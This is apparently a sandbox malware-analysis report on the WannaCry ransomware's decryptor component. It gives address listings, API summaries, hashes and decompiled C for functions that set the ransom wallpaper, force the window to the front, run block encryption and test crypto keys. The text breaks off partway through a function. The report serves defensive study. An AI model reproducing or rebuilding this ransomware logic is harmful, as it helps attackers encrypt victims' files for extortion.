                                  0x0041209e
                                  0x004120a4
                                  0x004120aa
                                  0x004120b0
                                  0x004121f2
                                  0x004120b6
                                  0x004120b6
                                  0x004120ba
                                  0x004120bf
                                  0x004120c6
                                  0x004120ca
                                  0x004120ce
                                  0x004120d3
                                  0x004120d7
                                  0x004120d7
                                  0x004120d9
                                  0x004120db
                                  0x004120dd
                                  0x00000000
                                  0x00000000
                                  0x004120df
                                  0x004120e1
                                  0x004120f7
                                  0x004120f7
                                  0x004120e3
                                  0x004120e3
                                  0x004120e6
                                  0x004120e8
                                  0x004120e8
                                  0x004120eb
                                  0x00000000
                                  0x004120ed
                                  0x004120ed
                                  0x004120f0
                                  0x004120f3
                                  0x004120f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004120f5
                                  0x004120eb
                                  0x00412100
                                  0x00412100
                                  0x00412102
                                  0x00412120
                                  0x00412124
                                  0x00412133
                                  0x00412136
                                  0x00412138
                                  0x0041213c
                                  0x00412150
                                  0x00412153
                                  0x0041215e
                                  0x00412161
                                  0x00412166
                                  0x0041216a
                                  0x00412170
                                  0x00412173
                                  0x00412173
                                  0x00412179
                                  0x0041217b
                                  0x0041218f
                                  0x00412192
                                  0x0041219d
                                  0x004121a0
                                  0x004121a5
                                  0x004121a9
                                  0x004121af
                                  0x004121b2
                                  0x004121b2
                                  0x004121b8
                                  0x004121ba
                                  0x004121e1
                                  0x004121e7
                                  0x004121ea
                                  0x004121ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412102
                                  0x004120fb
                                  0x004120fd
                                  0x00000000
                                  0x00412104
                                  0x0041210e
                                  0x00412115
                                  0x00412115
                                  0x00412119
                                  0x004121f6
                                  0x004121f6
                                  0x004121f8
                                  0x004121fa
                                  0x004121fb
                                  0x00412200
                                  0x00412200
                                  0x00412203
                                  0x00412214
                                  0x0041221f
                                  0x00412225
                                  0x0041222e
                                  0x00000000
                                  0x0041222e
                                  0x00411e83
                                  0x00411e83
                                  0x00411e84
                                  0x00411e9a
                                  0x00411e9a
                                  0x00411e47
                                  0x00411e53
                                  0x00411e53
                                  0x00411e1e
                                  0x00411e2a
                                  0x00411e2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411d37
                                  0x00411d39
                                  0x00411d5e
                                  0x00411d66
                                  0x00411d6d
                                  0x00411d71
                                  0x00411d74
                                  0x00411d7a
                                  0x00411d80
                                  0x00411d86
                                  0x00411d8c
                                  0x00411d92
                                  0x00411d98
                                  0x00411d9e
                                  0x00411da4
                                  0x00411daa
                                  0x00411db2
                                  0x00411d3b
                                  0x00411d57
                                  0x00411d57
                                  0x00411d39
                                  0x00411d35
                                  0x00411d16
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                  0x00407e86
                                  0x00407e9c
                                  0x00407ea4
                                  0x00407ea6
                                  0x00407eb3
                                  0x00407eb8
                                  0x00407eba
                                  0x00407eca
                                  0x00407ed2
                                  0x00407ed4
                                  0x00407ee6
                                  0x00407ef4
                                  0x00407efa
                                  0x00407f00
                                  0x00407f10
                                  0x00407f20
                                  0x00407f26
                                  0x00407f41
                                  0x00407f56
                                  0x00407f73
                                  0x00407f08
                                  0x00407f08
                                  0x00407f08

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                  0x004067f4
                                  0x004067fa
                                  0x00406802
                                  0x0040689c
                                  0x004068a5
                                  0x00406808
                                  0x0040680a
                                  0x0040680f
                                  0x00406823
                                  0x0040682b
                                  0x00406839
                                  0x0040683f
                                  0x00406846
                                  0x0040684c
                                  0x00406866
                                  0x00406879
                                  0x00406884
                                  0x0040688e
                                  0x00406899
                                  0x00406899

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                  0x0040b3c0
                                  0x0040b3c4
                                  0x0040b3ce
                                  0x0040b3d9
                                  0x0040b3e3
                                  0x0040b3e8
                                  0x0040b3e9
                                  0x0040b3e9
                                  0x0040b3ee
                                  0x0040b3f2
                                  0x0040b3f6
                                  0x0040b602
                                  0x0040b60b
                                  0x0040b615
                                  0x0040b61a
                                  0x0040b61b
                                  0x0040b624
                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b634
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690
                                  0x0040b3fc
                                  0x0040b3fc
                                  0x0040b40a
                                  0x00000000
                                  0x0040b410
                                  0x0040b410
                                  0x0040b417
                                  0x0040b4ed
                                  0x0040b4f0
                                  0x0040b4f4
                                  0x0040b5ba
                                  0x0040b5be
                                  0x0040b5c0
                                  0x0040b5c4
                                  0x0040b5ca
                                  0x00000000
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d1
                                  0x0040b5d4
                                  0x0040b5d9
                                  0x0040b5e3
                                  0x0040b5e5
                                  0x0040b5ea
                                  0x0040b5f0
                                  0x0040b5f2
                                  0x0040b5ff
                                  0x0040b5ff
                                  0x0040b4fa
                                  0x0040b4fe
                                  0x0040b500
                                  0x0040b504
                                  0x0040b508
                                  0x0040b50e
                                  0x00000000
                                  0x0040b510
                                  0x0040b516
                                  0x0040b516
                                  0x0040b51c
                                  0x0040b520
                                  0x0040b528
                                  0x0040b52c
                                  0x00000000
                                  0x00000000
                                  0x0040b534
                                  0x0040b538
                                  0x0040b53a
                                  0x0040b541
                                  0x0040b549
                                  0x0040b54a
                                  0x0040b54b
                                  0x0040b53a
                                  0x0040b555
                                  0x0040b559
                                  0x0040b55f
                                  0x0040b56f
                                  0x0040b56f
                                  0x0040b571
                                  0x0040b57b
                                  0x0040b57f
                                  0x0040b581
                                  0x0040b589
                                  0x0040b58a
                                  0x0040b590
                                  0x0040b512
                                  0x00000000
                                  0x0040b592
                                  0x0040b599
                                  0x0040b599
                                  0x00000000
                                  0x0040b590
                                  0x0040b5a5
                                  0x0040b5ab
                                  0x0040b5af
                                  0x0040b5b4
                                  0x0040b5b5
                                  0x00000000
                                  0x0040b5b5
                                  0x0040b50e
                                  0x0040b41d
                                  0x0040b429
                                  0x0040b42b
                                  0x0040b42f
                                  0x0040b435
                                  0x0040b4c5
                                  0x0040b4cc
                                  0x0040b43b
                                  0x0040b43b
                                  0x0040b43f
                                  0x0040b440
                                  0x0040b443
                                  0x0040b44b
                                  0x0040b44f
                                  0x00000000
                                  0x00000000
                                  0x0040b457
                                  0x0040b45b
                                  0x0040b461
                                  0x0040b461
                                  0x0040b467
                                  0x0040b46e
                                  0x0040b476
                                  0x0040b477
                                  0x0040b478
                                  0x0040b467
                                  0x0040b482
                                  0x0040b488
                                  0x0040b48e
                                  0x0040b49e
                                  0x0040b49e
                                  0x0040b4a0
                                  0x0040b4aa
                                  0x0040b4b0
                                  0x0040b4b2
                                  0x0040b4b4
                                  0x0040b4b5
                                  0x0040b4b9
                                  0x0040b4bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040b4bf
                                  0x0040b4d8
                                  0x0040b4de
                                  0x0040b4e2
                                  0x0040b4e7
                                  0x0040b4e8
                                  0x00000000
                                  0x0040b4e8
                                  0x0040b435
                                  0x0040b417
                                  0x0040b40a
                                  0x00000000

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                  0x004047c3
                                  0x004047c5
                                  0x004047ca
                                  0x004047d5
                                  0x004047d6
                                  0x004047e6
                                  0x004047e8
                                  0x004047ee
                                  0x004047f3
                                  0x004047f9
                                  0x004047ff
                                  0x00404805
                                  0x0040480b
                                  0x00404811
                                  0x00404818
                                  0x0040482c
                                  0x0040482c
                                  0x0040482e
                                  0x00404830
                                  0x0040483c
                                  0x00404841
                                  0x00404850
                                  0x004048f3
                                  0x004048f8
                                  0x00404905
                                  0x00404856
                                  0x00404856
                                  0x00404869
                                  0x0040486e
                                  0x00404873
                                  0x00404995
                                  0x00404995
                                  0x0040499a
                                  0x00000000
                                  0x00404879
                                  0x0040487c
                                  0x00404885
                                  0x0040488a
                                  0x0040488f
                                  0x00000000
                                  0x00404895
                                  0x004048a6
                                  0x004048a8
                                  0x004048ae
                                  0x004048b2
                                  0x004048bc
                                  0x004048bc
                                  0x004048be
                                  0x004048c9
                                  0x004048d0
                                  0x004048d1
                                  0x004048d3
                                  0x004048d5
                                  0x004048da
                                  0x004048e3
                                  0x0040491c
                                  0x00404928
                                  0x0040493d
                                  0x0040495c
                                  0x00404984
                                  0x0040498b
                                  0x00000000
                                  0x0040495e
                                  0x0040495e
                                  0x00404963
                                  0x00404964
                                  0x00404974
                                  0x00404981
                                  0x00404981
                                  0x0040492a
                                  0x0040492a
                                  0x0040492f
                                  0x00000000
                                  0x0040492f
                                  0x004048e5
                                  0x004048e5
                                  0x004048ea
                                  0x004048eb
                                  0x004048eb
                                  0x00000000
                                  0x004048f0
                                  0x004048e3
                                  0x0040488f
                                  0x00404873

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
